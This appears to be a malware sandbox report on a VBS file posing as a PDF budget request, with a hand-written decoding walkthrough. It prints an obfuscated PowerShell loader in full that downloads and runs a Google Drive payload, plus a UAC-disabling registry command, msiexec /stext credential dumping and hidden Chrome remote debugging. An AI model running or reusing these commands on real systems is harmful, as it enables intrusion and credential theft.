PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 2560 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 2560 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 1468 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sybotic Fladorme Ribbefri Sawpit #><#Twangling Heltidsbeskftigendes Underkaste Ejerstrukturen undladelsessynders Shufty #>$Saltekarrene='reflip';function Yoick($Glyphs){If ($host.DebuggerEnabled) {$Sekteriker++;$Sithement=$Glyphs.'Length' - $Sekteriker} for ( $swiveling=4;$swiveling -lt $Sithement;$swiveling+=5){$Rorke=$swiveling;$Reglers+=$Glyphs[$swiveling]}$Reglers}function Narrestregen($Beat){ .($projiceret) ($Beat)}$Konsumeringernes=Yoick ' awmnMis e Libt Sog.Asp WCande VagbTrk cThymLdemai SikEFin N ,ikt esk ';$Stilmblerne=Yoick 'AfstMBrano DepzF reiFr nlSemil unka .kt/Demn ';$Tsiology=Yoick 'C emTStanl SolsMyel1Nodd2A gr ';$Kontraktioners='Trop[ TruNOldfE istTgen .Cy rS BlaEZar rOpegvSysti itcCE.soeSynsPSypioI iti mpeNbndeTgregMFejla Vikn artADa rGVkkee Aflrslat]Olie:E tr:In eS Slae ammcTil.UFelwrTar IprovT StaySnylpBattRRoseoStafTMarioAut CTr kO ramlDisk=,usp$tar TU,diSHy,rIRui oB hrL nteo .msg N.nYTalo ';$Stilmblerne+=Yoick 'Majo5 Bar. 
Reg0 Com Ins( orWOrdiiPartn etedBredoCarow upesUncr GrapNFresTShun .rim1 Pe,0Wayl.sko 0Nazi; nte TelW GuriPalenrung6Lvfa4Vago; Rem Ihsx usp6Work4Sags; eca RedrrUn qv ver: ig1sire3 ou 1S it.Udle0 ros) Hje nbuGLoreeElekcunfaksk toUne /supe2Sulp0Pulm1L.uc0 S.u0 Kim1s,is0 Den1Glut BrneFa,paiMinorInteeSkolfPanlo C,pxBayr/Vift1 erf3Soft1Comp.tric0Hove ';$Bedazement=Yoick 'Ski,US alsGammEParkrJean-Re kaTaoiG BageUnpon eciTNrre ';$Amoralitetens112=Yoick ' hi.hAtomtShartB ugpNikksKltr:Tr.q/forg/Yok,d ritrScati MorvAfgreDeba.Sl mgKrusoBankoResigAdral Cr,eNonv.aflyc OpfoEftemBein/Justu LsecRac ?Fad e.hrexbiblpGrino ommrSocitGnav=Snond Oato IndwBetenHyb l UnpoBracaD tadSvrm&ParliKnopdBehn=Cant1 husGmanaY op V UklwE brA De ZbrevePol _ Nask Mav3IndsHrecoh Fu X H.soHynet Lov-TilfX.ikkTTffeFAntiVUdspa JulaCoulE.usch Va 9 LeaUS reUUninqVrdii.aryJ.idrHGablY tox ';$Vulvocrural=Yoick 'Bye >Exta ';$projiceret=Yoick 'IrroI SolEUdgaXS od ';$Spanierne='betydningslren';$swivelingnsipient='\Borgerrettighed.Pol';Narrestregen (Yoick 'Alky$TilkG RadLTr kO L.pbDataABushlSt l:TorrmBortYnormO de pPreerBarrOhalvTBirte C liM.sonSurg=oppu$Nun eR dunBobrVBlas:CoadasdumPNumep uledtmmeACroqTSte a ,nd+Bram$BallSsi.kW.icriIntevPulwENdr lLup IEatan AdvgOpern SskST,wei engPTidsIBi,teUnbuN Afnta is ');Narrestregen (Yoick ' Cha$ MargBag Lt stoMaribMercAStilL B,d:For.SHor.aFr,eLUlt gAr esL,vicShimHMo,ea Sp uM.ndFTankFSarkrPlir5upca3Izaf=.one$ArmeaPendMTtnioCarbrH arALng lS rdiRiddt.onfETrutT RecEMetrNTr.msEndt1Pala1Poly2Evil.IrresMo op Un lLirkIEchotFeml(Syst$UdskVNaa uN,npl icvImbuO.pstCDwarrkonsu FasrD.avABekrlhawa),ord ');Narrestregen (Yoick $Kontraktioners);$Amoralitetens112=$Salgschauffr53[0];$Skandale130=(Yoick 'Co,n$dio gibinlCykeODoteB DedAK plL ,em:giolSUfo k ProiAnaxLPer L Hume unVUddegskrmSSelvfTablLBefiyHaantFortnAffai Po ND.aegOligSA le=AvlenLegae.arnwprea-StrioGastbAlitjVandE Ai cBoliT Try BesS CuryAcmaSAnveTUhareUnmem Aft.bogs$PuiskLataOThewN kaSbygguOphom Al E rchRUd eICur 
NNonaGAarmeTrearde,aNWildeLvsaSpreo ');Narrestregen ($Skandale130);Narrestregen (Yoick 'Lisc$ SveS GrukHe.iiIn alGstel NoneAff vLym gTingsDem fSkrilPi.ayForstBesknB,ggiApornaagegjungsA ie.WielH ArveCapraAjledAbnoeMaskrOpbysMoon[Fe.h$ nteBMor.eT akdVulcaDevozV lgeF rlmdk ieCo sn.ecttnar ]Usn = Pyr$PangSBenetAffei ndsl,nfrm Moob tillEftee BogrSlvknKulle Br ');$Paramastigate=Yoick 'Snyd$PostSDetekS.bciDepalRe sl CiteOvervPr,vgDe,es JowfG rdlJoggyJ but ParnJageiRenunResigUni sUn a.T.enD.ynooVentwSulfnUndelUlovo GuaahunddPortFSor.iTherlsagteR.ms(Chon$El cA intm ovso arir nstaEksplSk.giUgant UnceDr ftSnedeSammn .eys Ra.1Styr1,arg2,lbe, Scr$Fo lJ StruEnt mLnfobAutol tile,jord Rek4 ebr1Sild)Udsk ';$Jumbled41=$Myoprotein;Narrestregen (Yoick 'R,su$Om,gGS,vsL aaOEpigB GalASymbL Slu: P tVHalsrRab I GamGPelt= Bla(ForsT Re eR,nmSSapoTOver-BaklPMidnaMisltAmbiHOp f Macr$Ol gJS avUForkmu.soBIndtL idE PreDH,ar4 Baj1 Cni) ver ');while (!$vrig) {Narrestregen (Yoick 'C,ar$KopigGy,nl Fiso Gi bAstea Ve,l Dea:Ban A TjabTravs renvMaglo MislL,antmin =Thor$Anubtnon r eruAutoe,las ') ;Narrestregen $Paramastigate;Narrestregen (Yoick ',illsGeneTAkhla IntRMisitCyto- bersGeofLarreePho eFor.PBr.s Stam4Midd ');Narrestregen (Yoick 'Spe $ nfuGOu dlMornoPreoBIm aa CyklHomm: IsbvScenrVerdiFascg,ens=Gest( DektCo.pEneigSLamptpigg-GoutPm.isATeleT.rbah ,uk Redi$ FrujPol.uvalgmBon BFi eL DiveOverdTi g4Cons1Elec) Pr ') ;Narrestregen (Yoick ' Phr$ SevgFodbl,agtoSnakbUde ABrnelNatt:Rou mImboORollDS,amu Zanl .reAP otTLandIMurrOTaroNBu h=.dvi$ ArsGSweeL Ku.OUnrub XreaOmkrlGall:FortD ndeEBrempalc.H PlaLN,diO,uliG OveITandS lot inniTittc soma omnT MusEmilj+Vedf+Patr%Tidm$ParaS Ch aBo.tlKikkGRedasTykscI.teh ndeA MaiUcataFPo sfVagor ig5 ont3Drif.m,lmCLiceoBeviUIntenGerbtFor ') ;$Amoralitetens112=$Salgschauffr53[$Modulation]}$Hvervenes=280926;$Korrespondens=30345;Narrestregen (Yoick '.amu$IberG .nfLUdenoLevebReasAfierLNaes:UnplFEquaoTarpRparaTJereROutbnThunElapnL Stes SvieRundRBldg Marv= M s ConfGantie UnstLebe- EyeC 
oleo TubnKnigTCan eMa znFor tDhan Prop$RuneJWateUmundM ekaBBruglRem.eNe eD.eho4Me a1Tryk ');Narrestregen (Yoick 'Reli$NonegRep lOranoMantbfaxeaReaslSoli:HoveKRegloWeisgDriva Ce lUndvsProskMoonaProbb ,etsTegn und =Ubev Pers[ Ve SmiscyCym sForstReocePaenm and.LambC WanoUndenAnalvHusleVibrr UnrtProg]mask:Dewb:KlieFJaycrDecaoSkjomSt nBLi eaPerss Xyle Lon6El e4Co.uSStoltInelroveri Snun AdvgIndt(Ante$A,owfMytoo plarSpeetRea.rForenP treReallPhocsJi se blorKoka)Micr ');Narrestregen (Yoick ' .un$ImmuG raLGgetoHy.rBOmbuA Vr l est: Oves T do Pe nUndegPosisSamkT ElaRImpreBranSSkibsSupeeU baS ao1 Ep 6B ff5Hamm Kr k=Lind Para[VrdisRelaYRe.asSeruTUrinEAfspmSty..DititAntiE ,ncxza iT ,ae.TherE ycanBereCFrgeoS uddDecriBe yn TeaGAnbe]Legi:Zina:Be.yA RaaS l.uCCellIS eei Sut.RoseGLaudeStrmtLrerSBaryT SamRS.kuIforfNOverGObse(Gen,$U.isKChecOUroegExpuA yralOrk S VenkA,anASpigB Carsno i) hir ');Narrestregen (Yoick 'Ophr$LitagMultLNomioSledbKubiAc urLColu: Ge mAnt eActiSOto,sErikeJupiNTrus= Fly$Spr SNiseOPer NDenaGUhanSBladtFuldRFl ve.ebisAf vSChinE SlysOutb1St r6,eni5s ba. ifns HeduStowBBjrnS RoutJulerInfoI BlonAutoG Res( V d$ andH alaVPdqae.ollRRapsVB llEA,niNm,gneDe esSkra,Une $Ri pkKle OAtomrHumiRNonfED.mmS EndPKommo.vern SkrdNordEbarnnAn,iSU,ti)Pycn ');Narrestregen $Messen;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Sybotic Fladorme Ribbefri Sawpit #><#Twangling Heltidsbeskftigendes Underkaste Ejerstrukturen undladelsessynders Shufty #>$Saltekarrene='reflip';function Yoick($Glyphs){If ($host.DebuggerEnabled) {$Sekteriker++;$Sithement=$Glyphs.'Length' - $Sekteriker} for ( $swiveling=4;$swiveling -lt $Sithement;$swiveling+=5){$Rorke=$swiveling;$Reglers+=$Glyphs[$swiveling]}$Reglers}function Narrestregen($Beat){ .($projiceret) ($Beat)}$Konsumeringernes=Yoick ' awmnMis e Libt Sog.Asp WCande VagbTrk cThymLdemai SikEFin N ,ikt esk ';$Stilmblerne=Yoick 'AfstMBrano DepzF reiFr nlSemil unka .kt/Demn ';$Tsiology=Yoick 'C emTStanl SolsMyel1Nodd2A gr ';$Kontraktioners='Trop[ TruNOldfE istTgen .Cy rS BlaEZar rOpegvSysti itcCE.soeSynsPSypioI iti mpeNbndeTgregMFejla Vikn artADa rGVkkee Aflrslat]Olie:E tr:In eS Slae ammcTil.UFelwrTar IprovT StaySnylpBattRRoseoStafTMarioAut CTr kO ramlDisk=,usp$tar TU,diSHy,rIRui oB hrL nteo .msg N.nYTalo ';$Stilmblerne+=Yoick 'Majo5 Bar. 
Reg0 Com Ins( orWOrdiiPartn etedBredoCarow upesUncr GrapNFresTShun .rim1 Pe,0Wayl.sko 0Nazi; nte TelW GuriPalenrung6Lvfa4Vago; Rem Ihsx usp6Work4Sags; eca RedrrUn qv ver: ig1sire3 ou 1S it.Udle0 ros) Hje nbuGLoreeElekcunfaksk toUne /supe2Sulp0Pulm1L.uc0 S.u0 Kim1s,is0 Den1Glut BrneFa,paiMinorInteeSkolfPanlo C,pxBayr/Vift1 erf3Soft1Comp.tric0Hove ';$Bedazement=Yoick 'Ski,US alsGammEParkrJean-Re kaTaoiG BageUnpon eciTNrre ';$Amoralitetens112=Yoick ' hi.hAtomtShartB ugpNikksKltr:Tr.q/forg/Yok,d ritrScati MorvAfgreDeba.Sl mgKrusoBankoResigAdral Cr,eNonv.aflyc OpfoEftemBein/Justu LsecRac ?Fad e.hrexbiblpGrino ommrSocitGnav=Snond Oato IndwBetenHyb l UnpoBracaD tadSvrm&ParliKnopdBehn=Cant1 husGmanaY op V UklwE brA De ZbrevePol _ Nask Mav3IndsHrecoh Fu X H.soHynet Lov-TilfX.ikkTTffeFAntiVUdspa JulaCoulE.usch Va 9 LeaUS reUUninqVrdii.aryJ.idrHGablY tox ';$Vulvocrural=Yoick 'Bye >Exta ';$projiceret=Yoick 'IrroI SolEUdgaXS od ';$Spanierne='betydningslren';$swivelingnsipient='\Borgerrettighed.Pol';Narrestregen (Yoick 'Alky$TilkG RadLTr kO L.pbDataABushlSt l:TorrmBortYnormO de pPreerBarrOhalvTBirte C liM.sonSurg=oppu$Nun eR dunBobrVBlas:CoadasdumPNumep uledtmmeACroqTSte a ,nd+Bram$BallSsi.kW.icriIntevPulwENdr lLup IEatan AdvgOpern SskST,wei engPTidsIBi,teUnbuN Afnta is ');Narrestregen (Yoick ' Cha$ MargBag Lt stoMaribMercAStilL B,d:For.SHor.aFr,eLUlt gAr esL,vicShimHMo,ea Sp uM.ndFTankFSarkrPlir5upca3Izaf=.one$ArmeaPendMTtnioCarbrH arALng lS rdiRiddt.onfETrutT RecEMetrNTr.msEndt1Pala1Poly2Evil.IrresMo op Un lLirkIEchotFeml(Syst$UdskVNaa uN,npl icvImbuO.pstCDwarrkonsu FasrD.avABekrlhawa),ord ');Narrestregen (Yoick $Kontraktioners);$Amoralitetens112=$Salgschauffr53[0];$Skandale130=(Yoick 'Co,n$dio gibinlCykeODoteB DedAK plL ,em:giolSUfo k ProiAnaxLPer L Hume unVUddegskrmSSelvfTablLBefiyHaantFortnAffai Po ND.aegOligSA le=AvlenLegae.arnwprea-StrioGastbAlitjVandE Ai cBoliT Try BesS CuryAcmaSAnveTUhareUnmem Aft.bogs$PuiskLataOThewN kaSbygguOphom Al E rchRUd eICur 
NNonaGAarmeTrearde,aNWildeLvsaSpreo ');Narrestregen ($Skandale130);Narrestregen (Yoick 'Lisc$ SveS GrukHe.iiIn alGstel NoneAff vLym gTingsDem fSkrilPi.ayForstBesknB,ggiApornaagegjungsA ie.WielH ArveCapraAjledAbnoeMaskrOpbysMoon[Fe.h$ nteBMor.eT akdVulcaDevozV lgeF rlmdk ieCo sn.ecttnar ]Usn = Pyr$PangSBenetAffei ndsl,nfrm Moob tillEftee BogrSlvknKulle Br ');$Paramastigate=Yoick 'Snyd$PostSDetekS.bciDepalRe sl CiteOvervPr,vgDe,es JowfG rdlJoggyJ but ParnJageiRenunResigUni sUn a.T.enD.ynooVentwSulfnUndelUlovo GuaahunddPortFSor.iTherlsagteR.ms(Chon$El cA intm ovso arir nstaEksplSk.giUgant UnceDr ftSnedeSammn .eys Ra.1Styr1,arg2,lbe, Scr$Fo lJ StruEnt mLnfobAutol tile,jord Rek4 ebr1Sild)Udsk ';$Jumbled41=$Myoprotein;Narrestregen (Yoick 'R,su$Om,gGS,vsL aaOEpigB GalASymbL Slu: P tVHalsrRab I GamGPelt= Bla(ForsT Re eR,nmSSapoTOver-BaklPMidnaMisltAmbiHOp f Macr$Ol gJS avUForkmu.soBIndtL idE PreDH,ar4 Baj1 Cni) ver ');while (!$vrig) {Narrestregen (Yoick 'C,ar$KopigGy,nl Fiso Gi bAstea Ve,l Dea:Ban A TjabTravs renvMaglo MislL,antmin =Thor$Anubtnon r eruAutoe,las ') ;Narrestregen $Paramastigate;Narrestregen (Yoick ',illsGeneTAkhla IntRMisitCyto- bersGeofLarreePho eFor.PBr.s Stam4Midd ');Narrestregen (Yoick 'Spe $ nfuGOu dlMornoPreoBIm aa CyklHomm: IsbvScenrVerdiFascg,ens=Gest( DektCo.pEneigSLamptpigg-GoutPm.isATeleT.rbah ,uk Redi$ FrujPol.uvalgmBon BFi eL DiveOverdTi g4Cons1Elec) Pr ') ;Narrestregen (Yoick ' Phr$ SevgFodbl,agtoSnakbUde ABrnelNatt:Rou mImboORollDS,amu Zanl .reAP otTLandIMurrOTaroNBu h=.dvi$ ArsGSweeL Ku.OUnrub XreaOmkrlGall:FortD ndeEBrempalc.H PlaLN,diO,uliG OveITandS lot inniTittc soma omnT MusEmilj+Vedf+Patr%Tidm$ParaS Ch aBo.tlKikkGRedasTykscI.teh ndeA MaiUcataFPo sfVagor ig5 ont3Drif.m,lmCLiceoBeviUIntenGerbtFor ') ;$Amoralitetens112=$Salgschauffr53[$Modulation]}$Hvervenes=280926;$Korrespondens=30345;Narrestregen (Yoick '.amu$IberG .nfLUdenoLevebReasAfierLNaes:UnplFEquaoTarpRparaTJereROutbnThunElapnL Stes SvieRundRBldg Marv= M s ConfGantie UnstLebe- EyeC 
oleo TubnKnigTCan eMa znFor tDhan Prop$RuneJWateUmundM ekaBBruglRem.eNe eD.eho4Me a1Tryk ');Narrestregen (Yoick 'Reli$NonegRep lOranoMantbfaxeaReaslSoli:HoveKRegloWeisgDriva Ce lUndvsProskMoonaProbb ,etsTegn und =Ubev Pers[ Ve SmiscyCym sForstReocePaenm and.LambC WanoUndenAnalvHusleVibrr UnrtProg]mask:Dewb:KlieFJaycrDecaoSkjomSt nBLi eaPerss Xyle Lon6El e4Co.uSStoltInelroveri Snun AdvgIndt(Ante$A,owfMytoo plarSpeetRea.rForenP treReallPhocsJi se blorKoka)Micr ');Narrestregen (Yoick ' .un$ImmuG raLGgetoHy.rBOmbuA Vr l est: Oves T do Pe nUndegPosisSamkT ElaRImpreBranSSkibsSupeeU baS ao1 Ep 6B ff5Hamm Kr k=Lind Para[VrdisRelaYRe.asSeruTUrinEAfspmSty..DititAntiE ,ncxza iT ,ae.TherE ycanBereCFrgeoS uddDecriBe yn TeaGAnbe]Legi:Zina:Be.yA RaaS l.uCCellIS eei Sut.RoseGLaudeStrmtLrerSBaryT SamRS.kuIforfNOverGObse(Gen,$U.isKChecOUroegExpuA yralOrk S VenkA,anASpigB Carsno i) hir ');Narrestregen (Yoick 'Ophr$LitagMultLNomioSledbKubiAc urLColu: Ge mAnt eActiSOto,sErikeJupiNTrus= Fly$Spr SNiseOPer NDenaGUhanSBladtFuldRFl ve.ebisAf vSChinE SlysOutb1St r6,eni5s ba. ifns HeduStowBBjrnS RoutJulerInfoI BlonAutoG Res( V d$ andH alaVPdqae.ollRRapsVB llEA,niNm,gneDe esSkra,Une $Ri pkKle OAtomrHumiRNonfED.mmS EndPKommo.vern SkrdNordEbarnnAn,iSU,ti)Pycn ');Narrestregen $Messen;"
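Every string literal in the command line above is fed through the Yoick function, which keeps one character in five (index 4, 9, 14, ...) and stops one short of the end; Narrestregen then dot-sources the decoded text, and $projiceret decodes to IEX, so each Narrestregen call is an Invoke-Expression. The upper bound of the loop is only assigned inside `If ($host.DebuggerEnabled)`; in a host that reports no debugger the bound stays $null, the loop never runs and every stage decodes to nothing. Decoded by hand, the rest of the script builds a Net.WebClient, forces Tls12 via [Net.ServicePointManager]::SecurityProtocol, sets a Firefox User-Agent, downloads the drive.google.com `uc?export=download` URL (the drive.google.com and drive.usercontent.google.com rows under Network) to $env:AppData + '\Borgerrettighed.Pol' (listed under Files; that literal is in the clear as $swivelingnsipient), polls with Test-Path and Start-Sleep until the file exists, base64-decodes its contents, and runs `.substring(280926, 30345)` of the result ($Hvervenes, $Korrespondens) with IEX. The following decoder is an added example for this page, not part of the sandbox output; the sample literals are copied verbatim from the command line, and the excerpt is a constructed fragment of it:

```python
import re

# Literals copied verbatim from the obfuscated command line (constructed sample set).
SAMPLES = {
    "webclient":  " awmnMis e Libt Sog.Asp WCande VagbTrk cThymLdemai SikEFin N ,ikt esk ",
    "tls":        "C emTStanl SolsMyel1Nodd2A gr ",
    "invoker":    "IrroI SolEUdgaXS od ",
    "ua_header":  "Ski,US alsGammEParkrJean-Re kaTaoiG BageUnpon eciTNrre ",
    "ua_prefix":  "AfstMBrano DepzF reiFr nlSemil unka .kt/Demn ",
    "tls_setter": "Trop[ TruNOldfE istTgen .Cy rS BlaEZar rOpegvSysti itcCE.soeSynsPSypioI iti mpeNbndeTgregMFejla Vikn artADa rGVkkee Aflrslat]Olie:E tr:In eS Slae ammcTil.UFelwrTar IprovT StaySnylpBattRRoseoStafTMarioAut CTr kO ramlDisk=,usp$tar TU,diSHy,rIRui oB hrL nteo .msg N.nYTalo ",
}

# A short, constructed excerpt of the command line, to show pulling literals out automatically.
EXCERPT = ("$Tsiology=Yoick 'C emTStanl SolsMyel1Nodd2A gr ';"
           "$Bedazement=Yoick 'Ski,US alsGammEParkrJean-Re kaTaoiG BageUnpon eciTNrre ';"
           "$projiceret=Yoick 'IrroI SolEUdgaXS od ';")

YOICK_CALL = re.compile(r"Yoick\s+'([^']*)'")


def yoick(glyphs: str, debugger_enabled: bool = True) -> str:
    """Python port of the Yoick function from the command line.

    PowerShell original, stripped of its junk names:
        for ($i = 4; $i -lt ($Glyphs.Length - 1); $i += 5) { $out += $Glyphs[$i] }

    The bound ($Glyphs.Length - 1, since $Sekteriker++ starts from $null and
    yields 1) is only set when $host.DebuggerEnabled is true.  When it is
    false the comparison '4 -lt $null' is false, the loop body never runs
    and the function returns nothing; that branch is modelled here by the
    debugger_enabled flag.
    """
    if not debugger_enabled:
        return ""
    bound = len(glyphs) - 1
    return "".join(glyphs[i] for i in range(4, bound, 5))


def decode_samples(debugger_enabled: bool = True) -> dict:
    """Decode the copied literals; keys are descriptive labels chosen for this example."""
    return {name: yoick(lit, debugger_enabled) for name, lit in SAMPLES.items()}


def decode_calls(script: str) -> list:
    """Decode every `Yoick '<literal>'` call found in a script fragment, in order."""
    return [yoick(lit) for lit in YOICK_CALL.findall(script)]


if __name__ == "__main__":
    for name, value in decode_samples().items():
        print(f"{name:>10}: {value}")
    print(decode_calls(EXCERPT))
```

Decoded values keep the mixed case the author typed (PowerShell is case-insensitive), so compare them case-insensitively when matching against the rest of the script. Running decode_calls over the whole command line, rather than the excerpt, yields the full download loop in execution order.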

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa39fbcc40,0x7ffa39fbcc4c,0x7ffa39fbcc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\euyomxdaaormfgjg"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pwdgnpncowjzhvfkrmd"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pwdgnpncowjzhvfkrmd"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\zqjzohyvkebesbtoaxpegvp"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2072,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1960,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2432 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3156 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4176,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4652 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4772 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4892,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4764 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

